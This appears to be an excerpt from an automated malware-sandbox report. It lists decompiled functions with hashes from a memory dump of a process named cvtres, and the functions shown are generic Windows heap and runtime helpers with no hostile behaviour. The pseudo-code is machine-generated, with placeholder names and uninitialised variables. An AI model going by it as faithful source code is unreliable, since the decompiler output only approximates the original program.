                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                        • Instruction ID: 3d143dba9e6b5f1ade28684283613ebcc79d2fa4a6f09676f59ad8805ee89fef
                                                                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                        • Instruction Fuzzy Hash: 47E0DF33A40218FBCB31AAD9AE09FAAFFBCFF88A61F010196B904D7150D5609E40C2D0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055BFF60 Relevance: .0, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055BFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x55811a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E056788F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E055C0050(_t14);
				}
			}










                                                                        0x055bff66
                                                                        0x055bff6b
                                                                        0x00000000
                                                                        0x055bff8f
                                                                        0x00000000
                                                                        0x055bff8f

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0750285d5dc02715e87222c936424479d82c1d798ffd202ef0017c9de6abcc1d
                                                                        • Instruction ID: 881da14f14d60f562888333baf2db9f8c8c516056cfd48cb7a0c864bd1ada5b7
                                                                        • Opcode Fuzzy Hash: 0750285d5dc02715e87222c936424479d82c1d798ffd202ef0017c9de6abcc1d
                                                                        • Instruction Fuzzy Hash: 86E0DFB0609284DFE734DB51D88CFB93BA9FF42721F1AC45DE0094B101E661E881C74A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 056341E8 Relevance: .0, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E056341E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x56808f0);
				_t5 = E055FD08C(__ebx, __edi, __esi);
				if( *0x56987ec == 0) {
					E055BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x56987ec == 0) {
						 *0x56987f0 = 0x56987ec;
						 *0x56987ec = 0x56987ec;
						 *0x56987e8 = 0x56987e4;
						 *0x56987e4 = 0x56987e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L05634248();
				}
				return E055FD0D1(_t5);
			}





                                                                        0x056341e8
                                                                        0x056341ea
                                                                        0x056341ef
                                                                        0x056341fb
                                                                        0x05634206
                                                                        0x0563420b
                                                                        0x05634216
                                                                        0x0563421d
                                                                        0x05634222
                                                                        0x0563422c
                                                                        0x05634231
                                                                        0x05634231
                                                                        0x05634236
                                                                        0x0563423d
                                                                        0x0563423d
                                                                        0x05634247

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ae128e0c8b9b2159f5e98219ab48eb366ca27fab180474331db5bf7b759f3378
                                                                        • Instruction ID: c80e8d2ef280d00c9d19cc96e183c18d42e8377b3a7ee16dadc4df93b553ded1
                                                                        • Opcode Fuzzy Hash: ae128e0c8b9b2159f5e98219ab48eb366ca27fab180474331db5bf7b759f3378
                                                                        • Instruction Fuzzy Hash: D5F01C7C520709DEDFA0EF64950A7AC7ABCF786311F405119E104AB6A5DF744484CF01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0565D380 Relevance: .0, Instructions: 21COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0565D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L055AE8B0(__ecx, _a4, 0xfff);
					L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                        0x0565d38a
                                                                        0x0565d39b
                                                                        0x0565d3b1
                                                                        0x00000000
                                                                        0x0565d3b6
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                        • Instruction ID: ae8a1602743d98d74193cad13e131145256c494bc355144f6fd858849c840fbc
                                                                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                        • Instruction Fuzzy Hash: ACE0C232380609BBEB225E44CC04F797B6AEB80BA0F104035FE085ABD0CA719D92DAC4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055DA185 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055DA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x56967e4 >= 0xa) {
					if(_t5 < 0x5696800 || _t5 >= 0x5696900) {
						return L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E055C0010(0x56967e0, _t5);
				}
			}





                                                                        0x055da190
                                                                        0x055da1a6
                                                                        0x055da1c2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x055da192
                                                                        0x055da192
                                                                        0x055da19f
                                                                        0x055da19f

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 133b4717eacbd99640c0d52426b8dd6f5941e440b394d3aaa988691b23c5dd38
                                                                        • Instruction ID: 675be11c9c6cd5c3f850b2f6905985d08488666303b986f2852d9e8ce05f725c
                                                                        • Opcode Fuzzy Hash: 133b4717eacbd99640c0d52426b8dd6f5941e440b394d3aaa988691b23c5dd38
                                                                        • Instruction Fuzzy Hash: 7AD02B322312016ACB3D9B84C99CB76262AF7C4740FB0044CF10B0F9B0DF5088D1D128
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D16E0 Relevance: .0, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055D16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E055D1710(0x56967e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L055C4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                        0x055d16e8
                                                                        0x055d16ef
                                                                        0x055d16f3
                                                                        0x055d16fe
                                                                        0x00000000
                                                                        0x055d1700
                                                                        0x055d170d
                                                                        0x055d170d
                                                                        0x055d16f2
                                                                        0x055d16f2
                                                                        0x055d16f2
                                                                        0x055d16f2

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6b708db3652fc253f0d2c1e502aae10e0e82d0d7ac14c83ec2eb7701fec34d5c
                                                                        • Instruction ID: 34ad205e0eb3bfc80a970b25c9872ae7aebb574593c60f301ff66c2ea4c1a568
                                                                        • Opcode Fuzzy Hash: 6b708db3652fc253f0d2c1e502aae10e0e82d0d7ac14c83ec2eb7701fec34d5c
                                                                        • Instruction Fuzzy Hash: 3FD0A77220160196DE3D5B18D858B146265FBC0BC1F38009CF107498D0CFA1CCD2E168
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 056253CA Relevance: .0, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E056253CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E055BEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                        0x056253ca
                                                                        0x056253ce
                                                                        0x056253d9
                                                                        0x056253de
                                                                        0x056253e1
                                                                        0x056253e1
                                                                        0x056253e6
                                                                        0x056253f3
                                                                        0x00000000
                                                                        0x056253f8
                                                                        0x056253fb

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                        • Instruction ID: fd6c2c928c0d20b7a7a8bbcc23f75cd6e818ed422a5fafc6a7b6945b63a627ca
                                                                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                        • Instruction Fuzzy Hash: 95E08C31A04A849FCF22DB88C658F8EB7F9FB88B00F180048A40A5FB20C664AC00CB00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D35A1 Relevance: .0, Instructions: 12COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055D35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E055BEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                        0x055d35a1
                                                                        0x055d35a1
                                                                        0x055d35a5
                                                                        0x055d35ab
                                                                        0x055d35ab
                                                                        0x055d35b5
                                                                        0x00000000
                                                                        0x055d35c1
                                                                        0x055d35b7

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                        • Instruction ID: 454c487cd0c80d3aaf5cd99cc4272146bd41e0da994b7a38c61fdaace3f93a87
                                                                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                        • Instruction Fuzzy Hash: 81D0A73350518199DB21EF18C1187A8B372BB02287F591855800605451C335490DC612
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055BAAB0 Relevance: .0, Instructions: 12COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055BAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                        0x055baab6
                                                                        0x055baabb
                                                                        0x0560a442
                                                                        0x00000000
                                                                        0x0560a448
                                                                        0x0560a454
                                                                        0x0560a454
                                                                        0x055baac1
                                                                        0x055baac1
                                                                        0x055baac6
                                                                        0x055baac6

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                        • Instruction ID: a9145f936d1c0e5a0aee143d5b2d0006d12230c28efa42d21a4f78fcd914aaa2
                                                                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                        • Instruction Fuzzy Hash: 9CD0C939352A80CFE61ACB0CC958B1633A4BB04B80FC50490E401CBB61E62CD944CA00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0562A537 Relevance: .0, Instructions: 11COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0562A537(intOrPtr _a4, intOrPtr _a8) {

				return L055C8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                        0x0562a553

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                        • Instruction ID: f8628627ac661717f78a8b601ce812fba63b6407668f5908bd9e7e13e17b29e5
                                                                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                        • Instruction Fuzzy Hash: D0C01232180248BBCB126E81CC00F067F2AFB94B60F008014BA080A5618632E970EA84
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055ADB40 Relevance: .0, Instructions: 11COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055ADB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L055C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                        0x055adb4d
                                                                        0x055adb54
                                                                        0x055adb5f
                                                                        0x055adb56
                                                                        0x055adb56
                                                                        0x055adb5c
                                                                        0x055adb5c

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                        • Instruction ID: 961e0c73938144abb8a15f83a8fb907e3cfd7345f92e4c2920016a7a9faac514
                                                                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                        • Instruction Fuzzy Hash: FCC08C31380A01AFEB322F20CD01F003AB0BB40F42F4400A06302DA4F0DB78D801EA00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055AAD30 Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055AAD30(intOrPtr _a4) {

				return L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                        0x055aad49

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                        • Instruction ID: ecb1f08357e6f05d6b952584b2d3dd098b57a3102c8ef778ac11f2a26de4fbce
                                                                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                        • Instruction Fuzzy Hash: B7C08C32180248BBC7126A85CD04F017F69E794B60F000024B6040AA618932E861D988
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D36CC Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055D36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L055C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                        0x055d36d2
                                                                        0x055d36e8
                                                                        0x055d36d4
                                                                        0x055d36e5
                                                                        0x055d36e5

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                        • Instruction ID: 1e17c659538271e37bed4cd9261eaeb5cb9c4f7bec4ff83eabc6ed6f2c3f5299
                                                                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                        • Instruction Fuzzy Hash: 59C02B71350440FFDB351F70CD10F14B264F740B22F6407987320454F0D5299C00D100
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055B76E2 Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055B76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                        0x055b76e4
                                                                        0x00000000
                                                                        0x055b76f8
                                                                        0x055b76fd

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                        • Instruction ID: de5eabdbad18d23a8cd612e3769627ef637d96c95126b6b8736bf702329772c6
                                                                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                        • Instruction Fuzzy Hash: 11C08C742619C45EFB2A5B08CE2CF303A90FB8C748F48019CAA220D8A1C3A8AC03D608
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055C3A1C Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055C3A1C(intOrPtr _a4) {
				void* _t5;

				return L055C4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                        0x055c3a35

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                        • Instruction ID: 2de5dc41536ef8ddcf4dc59ad9929ed41d0416d903c4542e29163b3b02b8e99c
                                                                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                        • Instruction Fuzzy Hash: C3C08C32180248BBCB226E81DC00F017F29E790B60F000020B6040A5608532ECA0D588
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055C7D50 Relevance: .0, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055C7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                        0x055c7d56
                                                                        0x055c7d5b
                                                                        0x055c7d60
                                                                        0x055c7d5d
                                                                        0x055c7d5d
                                                                        0x055c7d5d

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                        • Instruction ID: 9dd54fb445a184bb1d328f297e3e197cf8d6b6b3e02603d2a82b7bd7e49950a9
                                                                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                        • Instruction Fuzzy Hash: B5B092343119418FCE56DF18C080F2533E8FB48B40F8400D8E400CBA20D229E8008A00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055D2ACB Relevance: .0, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E055D2ACB() {
				void* _t5;

				return E055BEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                        0x055d2adc

                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                        • Instruction ID: e87f43e4051655fc3a8618abdc5969a696698cd2bb665167c5658ef45bdf1eba
                                                                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                        • Instruction Fuzzy Hash: 09B01232D10441CFCF02EF40C614B997335FB40750F094490900227930C228AC01CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9560 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e4070dc4b9c96345b55f4b4d501c76cc3dfbedd4600d8bed8f45c8ba2d8b1463
                                                                        • Instruction ID: 98a5949a53d5042263010ac66affd572ecfce634985a1a66ce164df2f455215e
                                                                        • Opcode Fuzzy Hash: e4070dc4b9c96345b55f4b4d501c76cc3dfbedd4600d8bed8f45c8ba2d8b1463
                                                                        • Instruction Fuzzy Hash: 3B900265261000020145A559064450B04A5B7D63953D2C015F2406590CCA6188657361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055EAD30 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 207b00c4a78dede3427c4c5e4668ab9b4bd4d28edf40e5ce36690881d9d9adee
                                                                        • Instruction ID: 7c0d7c7065f7b3e3862c1b9770c6b3a6f85ac87b8f46dcdbcaa4d130b55c32d6
                                                                        • Opcode Fuzzy Hash: 207b00c4a78dede3427c4c5e4668ab9b4bd4d28edf40e5ce36690881d9d9adee
                                                                        • Instruction Fuzzy Hash: 27900271A45000129140715948546464066B7E0785B96C011A1504554C8D948A5573E1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2cc9c51b5755a01c52595de9ab2a96035554a7c60a9816692ed3f89e34e4ee73
                                                                        • Instruction ID: c1ab9df0f8357cea6debfc7d297754d552028ed22827fb70b479fbe75de0d23c
                                                                        • Opcode Fuzzy Hash: 2cc9c51b5755a01c52595de9ab2a96035554a7c60a9816692ed3f89e34e4ee73
                                                                        • Instruction Fuzzy Hash: 489002E1241140924500A2598444B0A4565A7E0245B92C016E2044560CC9658851B275
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055E95F0 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8ce2bfe665cc7776d2fb744ad354d5f7d946be07398ceca3cafda948cc574d8b
                                                                        • Instruction ID: df0120eab0ad4422566f04b1fc9e427a837e83b72e82e6ca1d1ea8a3517cc4d2
                                                                        • Opcode Fuzzy Hash: 8ce2bfe665cc7776d2fb744ad354d5f7d946be07398ceca3cafda948cc574d8b
                                                                        • Instruction Fuzzy Hash: 4F90027124100802D104615948446860065A7D0345F92C011A7014655E9AA588917271
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055EA770 Relevance: .0, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
